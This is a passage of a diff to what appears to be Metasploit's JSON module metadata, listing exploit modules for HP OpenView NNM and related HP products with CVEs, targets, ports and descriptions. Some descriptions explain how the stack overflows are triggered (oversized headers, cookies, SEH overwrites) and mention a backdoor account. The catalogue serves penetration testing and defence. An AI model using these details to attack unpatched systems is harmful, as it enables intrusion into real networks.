+ "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50", + "HP OpenView Network Node Manager 7.53" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_getnnmdata_maxage", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_nnmrptconfig_nameparams": { + "name": "HP OpenView NNM nnmRptConfig nameParams Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_nnmrptconfig_nameparams", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-01-10", + "type": "exploit", + "author": [ + "sinn3r ", + "MC " + ], + "description": "This module exploits a vulnerability in HP NNM's nnmRptConfig.exe.\n A remote user can send a long string data to the nameParams parameter via\n a POST request, which causes an overflow on the stack when function\n ov.sprintf_new() is used, and gain arbitrary code execution.'", + "references": [ + "CVE-2011-0266", + "OSVDB-70473", + "ZDI-11-008" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "HP NNM 7.53 Windows Server 2003 Enterprise", + "HP OpenView Network Node Manager 7.50" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_nnmrptconfig_nameparams", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_nnmrptconfig_schdparams": { + "name": "HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_nnmrptconfig_schdparams", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-01-10", + "type": "exploit", + "author": [ + "sinn3r " + ], + "description": "This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,\n the overflow occurs during a ov.sprintf_new() call, which allows an attacker to\n overwrite data on the stack, and gain arbitrary code execution.", + "references": [ + "CVE-2011-0267", + "OSVDB-70473", + "ZDI-11-009" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "NNM 7.53 - Windows Server 2003 Ent" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_nnmrptconfig_schdparams", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_openview5": { + "name": "HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_openview5", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-12-06", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2007-6204", + "OSVDB-39530", + "BID-26741" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP OpenView Network Node Manager 7.50 / Windows 2000 All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_openview5.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_openview5", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovalarm_lang": { + "name": "HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovalarm_lang", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-09", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute\n arbitrary code.\n\n This specific vulnerability is due to a call to \"sprintf_new\" in the \"isWide\"\n function within \"ovalarm.exe\". A stack buffer overflow occurs when processing an\n HTTP request that contains the following.\n\n 1. An \"Accept-Language\" header longer than 100 bytes\n 2. An \"OVABverbose\" URI variable set to \"on\", \"true\" or \"1\"\n\n The vulnerability is related to \"_WebSession::GetWebLocale()\".\n\n NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.", + "references": [ + "CVE-2009-4179", + "OSVDB-60930", + "BID-37347", + "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-09-12", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53", + "HP OpenView Network Node Manager 7.53 (Windows 2003)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovalarm_lang", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovas": { + "name": "HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovas", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-04-02", + "type": "exploit", + "author": [ + "bannedit ", + "muts" + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier.\n Specifically this vulnerability is caused by a failure to properly handle user supplied input within the\n HTTP request including headers and the actual URL GET request.\n\n Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode\n which was alphanumeric encoded by muts in the original exploit.\n\n If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process\n as soon as possible. Any connections get reset after a short period of time. This is probably some timeout\n handling code that causes this.", + "references": [ + "CVE-2008-1697", + "OSVDB-43992", + "BID-28569" + ], + "platform": "Windows", + "arch": "", + "rport": 7510, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "Windows 2003/zip.dll OpenView 7.53", + "Windows 2000/jvm.dll OpenView NNM 7.51" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovas.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovas", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovbuildpath_textfile": { + "name": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovbuildpath_textfile", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-01", + "type": "exploit", + "author": [ + "Anyway ", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node\n Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long\n 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n The vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". There\n are no stack cookies, so exploitation is achieved by overwriting the saved return\n address.\n\n The vulnerability is due to the use of the function \"_OVConcatPath\" which finally\n uses \"strcat\" in an insecure way. User controlled data is concatenated to a string\n which contains the OpenView installation path.\n\n To achieve reliable exploitation a directory traversal in OpenView5.exe\n (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation\n path. If the installation path cannot be guessed the default installation path\n is used.", + "references": [ + "CVE-2011-3167", + "OSVDB-76775", + "BID-50471", + "ZDI-12-002", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovbuildpath_textfile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/hp_nnm_ovwebhelp": { + "name": "HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovwebhelp", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-09", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2009-4178", + "OSVDB-60929", + "BID-37340" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovwebhelp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovwebsnmpsrv_main": { + "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_main", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-06-16", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. The buffer being\n written to is 1024 bytes in size. It is important to note that this vulnerability must\n be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered!\n\n The vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is\n easily achieved by overwriting SEH structures.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.", + "references": [ + "CVE-2010-1964", + "OSVDB-65552", + "BID-40873", + "ZDI-10-108" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53 w/NNM_01201", + "HP OpenView Network Node Manager 7.53 (Windows 2003)", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_main", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovwebsnmpsrv_ovutil": { + "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-06-16", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. It is interesting to\n note that this vulnerability cannot be exploited by overwriting SEH, since attempting\n to would trigger CVE-2010-1964.\n\n The vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\"\n with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer\n which is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. When\n processing the address results in an error, the buffer is overflowed in a call to sprintf_new.\n There are no stack cookies present, so exploitation is easily achieved by overwriting the\n saved return address.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.", + "references": [ + "CVE-2010-1961", + "OSVDB-65428", + "BID-40638", + "ZDI-10-106", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53 w/NNM_01201", + "HP OpenView Network Node Manager 7.53 (Windows 2003)", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_ovutil", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_ovwebsnmpsrv_uro": { + "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-06-08", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n The vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010.\n\n Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined\n with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is\n important to note that this vulnerability must be exploited by overwriting SEH. This is since\n overflowing the buffer with controllable data always triggers an access violation when\n attempting to write static text beyond the end of the stack.\n\n Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish\n arbitrary code execution, a double-backward jump is used in combination with the Alpha2\n encoder.", + "references": [ + "CVE-2010-1960", + "OSVDB-65427", + "BID-40637", + "ZDI-10-105" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53 w/NNM_01206", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_uro", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_snmp": { + "name": "HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_snmp", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-09", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2009-3849", + "OSVDB-60933" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50 / Windows 2000 All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_snmp.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_snmp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_snmpviewer_actapp": { + "name": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_snmpviewer_actapp", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-05-11", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\n code.\n\n The vulnerable code lies within a function within \"snmpviewer.exe\" with a\n timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\n or POST request. The request must contain 'act' and 'app' parameters which, when\n combined, total more than the 1024 byte stack buffer can hold.\n\n It is important to note that this vulnerability must be exploited by overwriting SEH.\n While the saved return address can be smashed, a function call that occurs before\n the function returns calls \"exit\".", + "references": [ + "CVE-2010-1552", + "OSVDB-64975", + "BID-40068", + "ZDI-10-083", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.53 w/NNM_01201", + "HP OpenView Network Node Manager 7.53 (Windows 2003)", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_snmpviewer_actapp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_toolbar_01": { + "name": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_toolbar_01", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-01-07", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2008-0067", + "OSVDB-53222", + "BID-33147" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP OpenView Network Node Manager 7.50 / Windows 2000 All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_toolbar_01.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_toolbar_01", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_toolbar_02": { + "name": "HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_toolbar_02", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-21", + "type": "exploit", + "author": [ + "Oren Isacson", + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0\n and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an\n attacker may be able to execute arbitrary code. Please note that this module only works\n against a specific build (i.e. NNM 7.53_01195)", + "references": [ + "CVE-2009-0920", + "OSVDB-53242", + "BID-34294", + "URL-http://www.coresecurity.com/content/openview-buffer-overflows" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "HP OpenView Network Node Manager Release B.07.00", + "HP OpenView Network Node Manager 7.53 Patch 01195" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_toolbar_02.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_toolbar_02", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_webappmon_execvp": { + "name": "HP OpenView Network Node Manager execvp_nc Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_webappmon_execvp", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-07-20", + "type": "exploit", + "author": [ + "Shahin Ramezany ", + "sinn3r ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel'\n parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is not triggerable via a GET request due to limitations on the\n request size. The buffer being targeted is 16384 bytes in size. There are actually two\n adjacent buffers that both get overflowed (one into the other), and strcat is used.\n\n The vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to\n v 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by\n overwriting the saved return address or SEH frame.\n\n This vulnerability might also be triggerable via other CGI programs, however this was\n not fully investigated.", + "references": [ + "CVE-2010-2703", + "OSVDB-66514", + "BID-41829", + "ZDI-10-137", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "HP OpenView Network Node Manager 7.53 w/NNM_01206", + "HP OpenView Network Node Manager 7.53 (Windows 2003)", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_webappmon_execvp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_nnm_webappmon_ovjavalocale": { + "name": "HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow", + "fullname": "exploit/windows/http/hp_nnm_webappmon_ovjavalocale", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-08-03", + "type": "exploit", + "author": [ + "Nahuel Riva", + "sinn3r ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a request containing a cookie longer than 5120 bytes, an attacker can overflow\n a stack buffer and execute arbitrary code.\n\n The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is\n declared within this function. When the vulnerability is triggered, the stack trace looks\n like the following:\n\n #0 ...\n #1 sprintf_new(local_stack_buf, fmt, cookie);\n #2 OvWwwDebug(\" HTTP_COOKIE=%s\\n\", cookie);\n #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x);\n #4 sub_405ee0(\"nnm\", \"webappmon\");\n\n No validation is done on the cookie argument. There are no stack cookies, so exploitation\n is easily achieved by overwriting the saved return address or SEH frame.\n\n The original advisory detailed an attack vector using the \"OvJavaLocale\" cookie being\n passed in a request to \"webappmon.exe\". Further research shows that several different\n cookie values, as well as several different CGI applications, can be used.\n '", + "references": [ + "CVE-2010-2709", + "OSVDB-66932", + "BID-42154", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520", + "URL-http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "HP OpenView Network Node Manager 7.53", + "HP OpenView Network Node Manager 7.53 (Windows 2003)", + "Debug Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_nnm_webappmon_ovjavalocale", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_openview_insight_backdoor": { + "name": "HP OpenView Performance Insight Server Backdoor Account Code Execution", + "fullname": "exploit/windows/http/hp_openview_insight_backdoor", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-01-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\n class. When using this account, an attacker can abuse the\n com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system\n allowing the execution of arbitrary code.\n\n NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0", + "references": [ + "CVE-2011-0276", + "OSVDB-70754" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Universal Windows Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_openview_insight_backdoor.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_openview_insight_backdoor", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_pcm_snac_update_certificates": { + "name": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", + "fullname": "exploit/windows/http/hp_pcm_snac_update_certificates", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-09-09", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary\n files, just having into account binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.", + "references": [ + "CVE-2013-4812", + "OSVDB-97155", + "BID-62348", + "ZDI-13-225" + ], + "platform": "Windows", + "arch": "java", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP ProCurve Manager 4.0 SNAC Server" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_pcm_snac_update_certificates", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_pcm_snac_update_domain": { + "name": "HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload", + "fullname": "exploit/windows/http/hp_pcm_snac_update_domain", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-09-09", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary\n files, just having into account binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.", + "references": [ + "CVE-2013-4811", + "OSVDB-97154", + "BID-62349", + "ZDI-13-226" + ], + "platform": "Windows", + "arch": "java", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "HP ProCurve Manager 4.0 SNAC Server" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb", + "is_install_path": true, + "ref_name": "windows/http/hp_pcm_snac_update_domain", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/hp_power_manager_filename": { + "name": "HP Power Manager 'formExportDataLogs' Buffer Overflow", + "fullname": "exploit/windows/http/hp_power_manager_filename", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-10-19", + "type": "exploit", + "author": [ + "Alin Rad Pop", + "Rodrigo Escobar ", + "sinn3r " + ], + "description": "This 